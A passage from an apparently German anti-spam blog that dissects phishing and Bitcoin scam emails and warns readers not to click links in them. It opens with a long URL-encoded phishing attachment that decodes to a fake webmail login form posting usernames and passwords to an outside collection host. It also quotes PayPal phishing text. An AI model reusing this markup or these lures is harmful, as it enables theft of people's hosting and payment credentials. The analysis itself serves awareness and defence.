0%20%20%20%20%20%20%20%20%20%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%6D%61%69%6C%2E%6E%6F%76%6F%68%6F%67%61%72%2E%65%73%2F%73%6B%69%6E%73%2F%65%6C%61%73%74%69%63%2F%69%6D%61%67%65%73%2F%6C%6F%67%6F%2E%73%76%67%3F%73%3D%31%36%34%39%32%33%31%33%38%37%22%20%69%64%3D%22%6C%6F%67%6F%22%20%61%6C%74%3D%22%4C%6F%67%6F%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%66%6F%72%6D%20%69%64%3D%22%6C%6F%67%69%6E%2D%66%6F%72%6D%22%20%6E%61%6D%65%3D%22%6C%6F%67%69%6E%2D%66%6F%72%6D%22%20%63%6C%61%73%73%3D%22%70%72%6F%70%66%6F%72%6D%22%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%67%65%6E%65%72%61%6C%2F%61%70%69%2E%70%68%70%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%61%62%6C%65%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%62%6F%64%79%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%63%65%6E%74%65%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%64%69%76%20%63%6C%61%73%73%3D%22%61%6C%65%72%74%20%61%6C%65%72%74%2D%64%61%6E%67%65%72%22%20%69%64%3D%22%6D%73%67%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%49%6E%76%61%6C%69%64%20%50%61%73%73%77%6F%72%64%2E%2E%21%20%50%6C%65%61%73%65%20%65%6E%74%65%72%20%63%6F%72%72%65%63%74%20%70%61%73%73%77%6F%72%64%2E%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%69%64%3D%22%65%72%72%6F%72%22%20%63%6C%61%73%73%3D%22%74%65%78%74%2D%64%61%6E%67%65%72%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%54%68%61%74%20%61%63%63%6F%75%6E%74%20%64%6F%65%73%6E%27%74%20%65%78%69%73%74%2E%20%45%6E%74%65%72%20%61%20%64%69%66%66%65%72%65%6E%74%20%61%63%63%6F%75%6E%74%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%63%65%6E%74%65%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%70%72%65%70%65%6E%64%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%74%65%78%74%20%69%63%6F%6E%20%75%73%65%72%22%3E%3C%2F%69%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%61%69%22%20%69%64%3D%22%61%69%22%20%72%65%71%75%69%72%65%64%3D%22%22%20%73%69%7A%65%3D%22%34%30%22%20%61%75%74%6F%63%61%70%69%74%61%6C%69%7A%65%3D%22%6F%66%66%22%20%61%75%74%6F%63%6F%6D%70%6C%65%74%65%3D%22%6F%66%66%22%20%74%79%70%65%3D%22%74%65%78%74%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%55%73%65%72%6E%61%6D%65%22%3E%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%70%72%65%70%65%6E%64%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%74%65%78%74%20%69%63%6F%6E%20%70%61%73%73%22%3E%3C%2F%69%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%70%72%22%20%69%64%3D%22%70%72%22%20%72%65%71%75%69%72%65%64%3D%22%22%20%73%69%7A%65%3D%22%34%30%22%20%61%75%74%6F%63%61%70%69%74%61%6C%69%7A%65%3D%22%6F%66%66%22%20%61%75%74%6F%63%6F%6D%70%6C%65%74%65%3D%22%6F%66%66%22%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%50%61%73%73%77%6F%72%64%22%3E%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%61%62%6C%65%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%70%20%63%6C%61%73%73%3D%22%66%6F%72%6D%62%75%74%74%6F%6E%73%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%62%75%74%74%6F%6E%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%69%64%3D%22%73%75%62%6D%69%74%2D%62%74%6E%22%20%63%6C%61%73%73%3D%22%62%75%74%74%6F%6E%20%6D%61%69%6E%61%63%74%69%6F%6E%20%73%75%62%6D%69%74%20%62%74%6E%20%62%74%6E%2D%70%72%69%6D%61%72%79%20%62%74%6E%2D%6C%67%20%74%65%78%74%2D%75%70%70%65%72%63%61%73%65%20%77%2D%31%30%30%22%3E%4C%6F%67%69%6E%3C%2F%62%75%74%74%6F%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%70%3E%0A%09%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%6F%67%69%6E%2D%66%6F%6F%74%65%72%22%20%72%6F%6C%65%3D%22%63%6F%6E%74%65%6E%74%69%6E%66%6F%22%3E%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%66%6F%72%6D%3E%0A%20%20%20%20%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%21%2D%2D%20%4F%70%74%69%6F%6E%61%6C%20%4A%61%76%61%53%63%72%69%70%74%20%2D%2D%3E%0A%20%20%20%20%3C%21%2D%2D%20%6A%51%75%65%72%79%20%66%69%72%73%74%2C%20%74%68%65%6E%20%50%6F%70%70%65%72%2E%6A%73%2C%20%74%68%65%6E%20%42%6F%6F%74%73%74%72%61%70%20%4A%53%20%2D%2D%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%6F%64%65%2E%6A%71%75%65%72%79%2E%63%6F%6D%2F%6A%71%75%65%72%79%2D%33%2E%32%2E%31%2E%73%6C%69%6D%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%4B%4A%33%6F%32%44%4B%74%49%6B%76%59%49%4B%33%55%45%4E%7A%6D%4D%37%4B%43%6B%52%72%2F%72%45%39%2F%51%70%67%36%61%41%5A%47%4A%77%46%44%4D%56%4E%41%2F%47%70%47%46%46%39%33%68%58%70%47%35%4B%6B%4E%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%64%6E%6A%73%2E%63%6C%6F%75%64%66%6C%61%72%65%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%70%6F%70%70%65%72%2E%6A%73%2F%31%2E%31%32%2E%39%2F%75%6D%64%2F%70%6F%70%70%65%72%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%41%70%4E%62%67%68%39%42%2B%59%31%51%4B%74%76%33%52%6E%37%57%33%6D%67%50%78%68%55%39%4B%2F%53%63%51%73%41%50%37%68%55%69%62%58%33%39%6A%37%66%61%6B%46%50%73%6B%76%58%75%73%76%66%61%30%62%34%51%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%78%63%64%6E%2E%62%6F%6F%74%73%74%72%61%70%63%64%6E%2E%63%6F%6D%2F%62%6F%6F%74%73%74%72%61%70%2F%34%2E%30%2E%30%2F%6A%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%4A%5A%52%36%53%70%65%6A%68%34%55%30%32%64%38%6A%4F%74%36%76%4C%45%48%66%65%2F%4A%51%47%69%52%52%53%51%51%78%53%66%46%57%70%69%31%4D%71%75%56%64%41%79%6A%55%61%72%35%2B%37%36%50%56%43%6D%59%6C%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%61%6A%61%78%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%6A%71%75%65%72%79%2F%32%2E%32%2E%34%2F%6A%71%75%65%72%79%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%73%74%61%63%6B%70%61%74%68%2E%62%6F%6F%74%73%74%72%61%70%63%64%6E%2E%63%6F%6D%2F%62%6F%6F%74%73%74%72%61%70%2F%34%2E%31%2E%33%2F%6A%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E'));
</script>
</html>
$ _

…ein Javascript-Programm, das ein HTML-Dokument erzeugt. Warum man das nicht direkt in HTML schreibt? Weil man etwas zu verbergen hat, natürlich. Denn selbstverständlich kann man so etwas direkt in HTML schreiben, nur, dass es dann auch jeder ohne Probleme lesen könnte und dass dann Antivirus-Schlangenöle leichtes Spiel haben. So muss ein interessierter Leser ein paar Umwege machen, wenn er neugierig wird. 🛠️

$ cat decr.pl
$l = <>;
$l =~ s/^.*\'([^\']*)\'.*$/\1/;
foreach (split /%/, $l) { printf "%c", hex($_); }
$ cat Rechnung-137784.html | grep unescape | perl decr.pl

Ja, ich weiß: Perl sieht einfach nur schrecklich und unlesbar aus, aber es tippt sich schnell. 😉️

Und nein, so große Umwege sind es nicht. Ich habe mir schon Schlimmeres angeschaut. Aber es übersteigt eben die Kenntnisse gewöhnlicher Anwender erheblich. Und das ist der Zweck der Übung. 🎭️

Ich erspare hier jetzt mal die 4546 Byte lange HTML-Ausgabe dieses winzigen Skriptes und komme auf den Punkt. Man soll im generierten Dokument einen Usernamen und ein Passwort angeben. Diese werden jedoch nicht zu HostEurope gesendet, sondern zu einer Website in der Domain mailbusinessionos (punkt) com, die ganz sicher nichts mit HostEurope zu tun hat. (Der Hoster war inzwischen so nett, dieser Phishing-Site den Stecker zu ziehen.) Danach haben kriminelle Phisher die Zugangsdaten für das Webhosting anderer Leute, und sie werden dort alles tun, was ein gutes Geschäft für kriminelle Phisher ist: Vom Betrugsshop über weiteres Phishing bis hin zu Darstellungen sexuellen Kindesmissbrauchs. Und wer hat für diese Verbrechen die Kriminalpolizei vor der Tür stehen? Richtig: Die arme Seele von Domaininhaber und Website-Betreiber, die auf ein Phishing reingefallen ist. 🎣️

Sollten Sie Fragen zu Ihrer Rechnung oder Ihrem Vertrag haben, helfe ich Ihnen gerne weiter.

Wer sich fragt, wie man verhindern kann, auf so etwas reinzufallen: Das ist sehr einfach, und man braucht dafür weder spezielle Software noch muss man besondere Kenntnisse haben. Niemals in eine E-Mail klicken! Auch nicht, um einen Anhang zu öffnen! Wenn man solche Websites wie die seiner Bank, seines Händlers, seines Webhosters etc. als Lesezeichen im Webbrowser ablegt und nur über das Lesezeichen im Webbrowser aufruft, kann einem kein Krimineller einen vergifteten Link unterschieben. Nach einer solchen Mail einfach die Website über das Lesezeichen aufrufen. Dieses bisschen Vorsicht, das nichts kostet und mit keinem Komfortverlust verbunden ist, kann viel Geld und jahrelangen Ärger ersparen. Und es ist sehr einfach. Aber das erwähnte ich ja schon. 🛡️

Also: Lasst die Phisher verhungern! Keiner vermisst sie. ⚰️

Ihr

Host Europe GmbH
Kundenservice

Host Europe GmbH • Hansestr. 111 • 51149 Köln •
Gerichtsstand: HRB 28495 • Amtsgericht Köln • Umsatzsteuer.-ID: DE187370678
Geschäftsführer: Paul Ashcroft, Tim Montag, Michele Lau, Nicholas Daddario

Wie schon gesagt: HostEurope hat mit dieser Spam nichts zu tun.

Euer Nachtwächter!

Diese Phishing-Spam aus dem täglichen Klo ist ein Zustecksel meines Lesers A. H.

Your PayPal account was temporary limited on: March 10, 2022 8:27 AM

Samstag, 12. März 2022

Wollt ihr nicht auch noch die Sekunden angeben?! 😁️

Dear Customer

Genau mein Name! 👏️

Your account was temporary limited, please view the attached document (PDF)

Leider hatte „PayPal“ nicht mehr genug Mailpapier herumliegen und konnte deshalb nicht in die Mail reinschreiben, um was es eigentlich in der Mail geht! Deshalb soll man klicki-klicki in eine E-Mail machen, um einen Anhang zu öffnen. Das ist immer eine ganz dumme Idee. 🚫️🖱️

Es gibt einen hundertprozentig wirksamen Schutz vor Phishing, der immer noch häufigsten Kriminalitätsform im Internet: Niemals in eine E-Mail klicken. Wenn man sich für Websites wie PayPal einfach ein Lesezeichen im Webbrowser anlegt, die Website über dieses Lesezeichen aufruft, sich dort ganz normal anmeldet und nach der Anmeldung bemerkt, dass das in der Spam behauptete Problem gar nicht existiert, hat man einen dieser gefürchteten Cyberangriffe abgewehrt. 🛡️

So einfach geht das. 👍️

Der Anhang ist…

$ file StatementX-PPL52684.pdf 
StatementX-PPL52684.pdf: PDF document, version 1.4
$ pdfinfo StatementX-PPL52684.pdf 
Creator:        Chromium
Producer:       Skia/PDF m99
CreationDate:   Thu Mar 10 17:07:49 2022 CET
ModDate:        Thu Mar 10 17:07:49 2022 CET
Tagged:         yes
UserProperties: no
Suspects:       no
Form:           none
JavaScript:     no
Pages:          1
Encrypted:      no
Page size:      1024.08 x 726 pts
Page rot:       0
File size:      47121 bytes
Optimized:      no
PDF version:    1.4
$ pdftotext StatementX-PPL52684.pdf -
Dear Customer,
Your PayPal account has been temporarily Limited. We have found suspicious activity on
credit cards linked to your PayPal account.
What's going on?
To continue using your account again, we advise you to update the infomation before 24
hours or your account will be Permanently limited.
To start using your account as usual again, please log in and follow the steps shown. This
will help us secure your account.
Login To Verify
Questions?
If you still have questions, please choose Contact at the bottom of any PayPal page to
reach Customer Service.
Sincerely,
PayPal

Copyright © 1999-2020 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95131.
PayPal PPC002342:1.11:6889186f769ff

$ _

…ein PDF-Dokument, in dem ein ganz normaler, banaler Phishing-Text steht. Wer in diesem Anhang auf das Klickeknöpfchen Login to Verify klickt, landet natürlich nicht bei Paypal, sondern auf einer „liebevoll“ nachgemachten Paypal-Seite. Sämtliche Eingaben, die man dort macht, gehen direkt an Kriminelle, die dann das Konto und die Kreditkarte (die Kreditkartendaten werden routinemäßig mit abgefragt) für Betrugsgeschäfte übernehmen. Den Schaden und oft mehrjährigen Ärger hat der Mensch, der auf dieses Phishing hereingefallen ist. ☹️

Deshalb klickt man nicht in eine E-Mail. 🚫️🖱️

Und auch nicht in den Anhang einer E-Mail. Aber dafür hätte man ja schon vorher in die E-Mail klicken müssen, und das macht man nicht. 🚫️🖱️

Ansonsten ist die einzige Neuerung bei diesem PDF, dass es im Querformat kommt. Wieso der Spammer das für eine gute Idee hält, weiß ich nicht. Ich vermute aber, dass der Spammer es selbst nicht weiß. 😁️

Diese Phishing-Spam ist ein Zustecksel meines Lesers A. H.

Vorsicht! Pressemitteilung! Von Notar Getestet!

Mittwoch, 2. März 2022

Aber ich bin doch gar keine Presse. Aber schön, dass der Absender gleich im Betreff klar macht, dass seine Spam zur Veröffentlichung bestimmt ist. Kann er gern haben! 😁️

Diese Email ist strengvertraurlich [sic!] und nur für Sie bestimmt!

Diese unverschlüsselte und nicht digital signierte E-Mail wurde offen wie eine Postkarte durch das Internet transportiert und konnte auf dem ganzen Weg mitgelesen und sogar verändert werden, ohne dass man das irgendwie bemerken könnte. Wer in solchen E-Mails von ganz geheimen Geheimgeheimnissen redet, hat eine Meise, aber mindestens so groß wie ein Bronto. 🦕️

Sie haben jetzt X10.3 neue Bitcoins auf Ihrem Konto.

Oh, X10.3? Habt ihr Reichwerdexperten euer Spamskript mal wieder nicht verstanden? Sollte da nicht eine Zahl stehen? 🤔️

Diese Technik, die hirnt aber auch immer so! Aber hauptsache, mit dem Reichwerden durch Bitcoin kennt ihr euch aus! 🤭️

Wir versuchen Sie bezüglich der ausstehenden Transaktionsbestätigung zu kontaktieren. Bitte fahren Sie unten fort, um auf Ihre ausstehende Transaktion zuzugreifen.

MEHR DETAILS ANZEIGEN

Das ist einer der verschwurbelsten, dümmsten und umständlichsten Click-here-Texte, die ich je gelesen habe. Und ja, ich habe viele gelesen. 🖱️👊️

Aber auch inhaltlich ist es eine echte Perle. Erst wird behauptet, ich habe Geld auf einem mir unbekannten Konto bei der Schlaraffenland-Bank, also muss bereits eine Transaktion gelaufen sein. Und dann wird von einer ausstehenden Bestätigung der Transaktion gesprochen, die erfordert, dass ich klicki-klicki mache. Und falls die Zielgruppe „Opfer von Schule, Glotze und Gossenjournalismus“ das immer noch nicht versteht, soll man einfach klicken, um darauf zuzugreifen. Man muss nicht unbedingt dumm sein, um darauf reinzufallen, aber es ist hilfreich. 🤡️

Diese E-Mail enthält die Informationen die Sie benötigen um auf die Transaktionsbestätigung zuzugreifen!

Bitte überprüfen Sie die unten aufgeführten Informationen.

Woran soll ich die denn überprüfen? Soll ich die folgenden Zahlen und abgeschriebenen Löffel Buchstabensuppe etwa mit irgendwas vergleichen, was mir angezeigt wird, wenn ich klicki-klicki mache? So nach dem Motto „Ich behaupte etwas, und jetzt klick mal hier zu meiner Website, um meine Behauptung zu überprüfen“? 🤦‍♂️️

Kontonummer: 964880869

Transaktionsnummer: 03325721

Konto-ID: 91BTC2DE89

Transaktion: 2-4833BTC

Gesamt erhalten: € 198.380,28

Oh, ich dachte, ich habe Bitcoin. Jetzt habe ich Euro? Da bin ich aber froh, dass ich nicht in Wirklichkeit russische Rubel oder türkische Lira habe. 😶️

Transaktion jetzt bestätigen (Hier klicken)

Bitte bestätigen Sie diese Transaktion innerhalb von 24 Stunden ansonsten verfällt Ihr Guthaben (Hier klicken)

Aha, es ist eine dieser Spezialbanken, wo man klicken muss, damit die Überweisung auf das eigene Konto auch wirklich ankommt. Und wenn man das nicht schnell genug macht, dann wird das Geld feierlich verbrannt. 🤣️

Mit freundlichen Grüssen

Freundlich wie ein Kackhäufchen vor der Haustür. 💩️

Annika Peters

Ausgedachter Name. 🤥️

Wenn Sie von uns nicht erneut kontaktiert werden möchten klicken Sie HIER

Wer unbedingt noch mehr Spam haben möchte, muss nur klicken, um den Spammern zu sagen, dass die Spam ankommt, gelesen wird und beklickt wird. Danach wird es nie wieder ruhig im Postfach. 🚾️

Und nein, die hier überrumpelnd angebotene Reichwerdmethode durch Bitcoin funktioniert nicht. Sonst brauchten diese Allerweltsbetrüger ja nicht wie die kleinen schäbigen Verbrecher zu spammen, um neue Opfer für den Schwindel zu finden, sondern sie würden einfach mit ihrer eigenen Reichwerdmethode reich. Die wissen genau, dass ihre angepriesene Methode nicht funktioniert. Man kann mit seinem Geld wirklich etwas Besseres anfangen, als solchen asozialen Lallbacken den verfeinerten Lebensstil zu finanzieren. 💡️

Diese hochbescheuerte Bitcoin-Reichwerd-Spam ist ein Zustecksel meines Lesers A. H.

Gratulation, Dein Platz ist reserviert

Mittwoch, 9. Februar 2022

Aber ich will doch gar nicht in die Klapsmühle. 😶️

Do This Before Bedtime For Explosive Size

Und ich will auch nicht im Bett explodieren. 💣️

BITCOINSystem
Garantierte Marke

So so, eine „garantierte Marke“. Bis heute kannte ich nur „eingetragene Marken“, aber man lernt ja nie aus. 😁️

  • Konto : 2145853248
    Transaktion- ( AU#GEO-6093829943)

Schritt 1- Zahlung erfolgreich

Dein Kontostand:
€ 274.914,00

Transaktionsbestätigung :

Hier Ihre Zahlungsdetails. BitycoinSystem # 67115543
Guthaben : € 274.914,00

Hier anfordern (Klick)
Nur noch 4 Tage gültig!

Guthaben : € 274.914,00

Hach, so viele Zahlen! Wenn euch Spammern die Zahlen mal ausgehen sollten, hier habe ich noch ein paar für euch:

$ perl -e 'for (1..32) { printf "%10d%s", rand(1e10), $_ & 3 ? "\t" : "\n"; }'
6007982067	7075003335	 171692842	6020096660
5337454002	9547564906	5898207334	7076601083
6966889209	7736394371	9523233708	2031993067
1020919652	6256155263	7689174696	4152807624
7245057050	7021399539	5236438229	1361108709
8057688552	5858794255	5939897653	9127170063
3853257155	8903925279	2340161973	5197472634
3161695533	3554256364	2177698006	7414219823
$ _

So viele wichtig aussehende Zahlen! Und so bedeutungsvoll! 😎️

Und die Zahlen, die irgendwelches Geld bedeuten, die flattern einfach wie ein wildes Vöglein davon, wenn man nicht binnen vierer Tage klicki-klicki macht. Eine ganz spezielle Spezial-Bitcoinbank muss das sein! 🏚️

Eröffne deinen Account: BitcoinSystem (Hier klicken)

Immerhin ist die Spam „zielgruppengerecht“. Zu einem Link wird eigens dazugeschrieben, dass man ihn klicken muss. Für Leute, die da sonst nicht drauf kommen würden. Denn genau das sind die Leute, denen diese Betrüger das Geld aus der Tasche ziehen wollen, nachdem sie ihnen erzählt haben, dass das Geld jetzt einfach hokus pokus internet aus der Steckdose kommt. 🔌️💶️

Aber warum soll ich denn ein Konto (engl: account) eröffnen? Weiter oben wurde anstelle meines Namens doch meine Kontonummer angegeben. Das Konto muss also schon existieren, und angeblich ist ja auch Geld drauf. Was soll ich da also eröffnen. 🤔️

Wer sich solche Fragen noch stellen kann, ist für den Betrug dieser Spammer schon viel zu intelligent. Die suchen die Dümmsten der Dümmsten der Dümmsten. Leute, denen man erzählen kann: „Gebt mir jetzt einfach ein paar hundert Euro, und ich gebe euch in ein paar Wochen das Doppelte, weil ich einen Zaubertrick im Internet kenne. Und danach belabere ich euch, dass ihr mir immer mehr Geld gebt, damit ich es für euch vermehre, und die Gewinne lasst ihr am besten einfach stehen, weil es ja immer mehr wird, ich zeige euch auch schöne Zahlen in einer App dafür an“. Und die schöpfen keinen Verdacht. Es ist ja das Internet. Das verstehen sie nicht. Da ist alles möglich. Sogar, dass es irgendwo ein verstecktes Schlaraffenland gibt, wo einem die Bratwürste einfach in den Mund fliegen. 🤦‍♂️️

Schritt 2-
Zugang erhalten

Beteilige dich auch, schon 201,554 Millionäre

Zugang zu was? Zum Irrenhaus? 😱️

Wer auf den Link klickt, landet auf einer Website namens Bitcoin System, die schon jahrelang nicht mehr gepflegt wird, denn wenn Spammer sich Mühe geben wollten, könnten sie ja gleich anfangen zu arbeiten. Diese Website des spammigen Reichwerdexperten Steve McKay…

Detail aus der betrügerischen Website: Lernen sie Steve McKay kennen, mit Foto des angeblichen Reichwerdexperten

…teilt ihre wesentliche Botschaft in einem eingebetteten Video mit, von dem ich schon vor zwei Jahren eine „Sicherheitskopie“ angelegt habe, damit man es sich auch anschauen kann, ohne in eine Spam zu klicken. Es ist seitdem unverändert. Nein, nicht völlig unverändert. Die Videoauflösung wurde noch weiter reduziert. Vermutlich haben die aktuellen Betrüger einfach die Website und das Video von anderen Betrügern genommen und beim Video-Download haben sie ein Klickiklicki-Tool für Nichtskönner benutzt, das das Video auch noch konvertiert. Mit Qualitätsverlust. Bei mir gibt es dieses Video tatsächlich in besserer Qualität. 👍️

Also besserer optischer Qualität. Von der intellektuellen Qualität will ich lieber nichts erzählen. Die ist exkrementiell. 💩️

Hier klicken wenn Sie sich unserer Sicherheit nicht sicher sind können sich jederzeit wieder abmelden.

Ich bin mir eurer Sicherheit erst sicher, wenn ihr im Knast sitzt! 👮‍♂️️

2021 @ BitcoinSystem

Krass, mit proklamiertem geistigen Eigentum! Aber leider mit dem falschen Jahr. Vielleicht sollten die mal den Kalender nachstellen. Aber hauptsache, die kennen sich damit aus, wie man mit Bitcoinzaubereien vollautomatisch zum Millionär wird. Da muss man nicht auch noch das aktuelle Jahr kennen. 😂️

Diese Spam ist ein Zustecksel meines Lesers A. H., der damit in großen Mengen belästigt wird

Inkassoauftrag

Dienstag, 1. Februar 2022

Diese Email ist strengvertraurlich [sic!] und nur für Sie bestimmt!

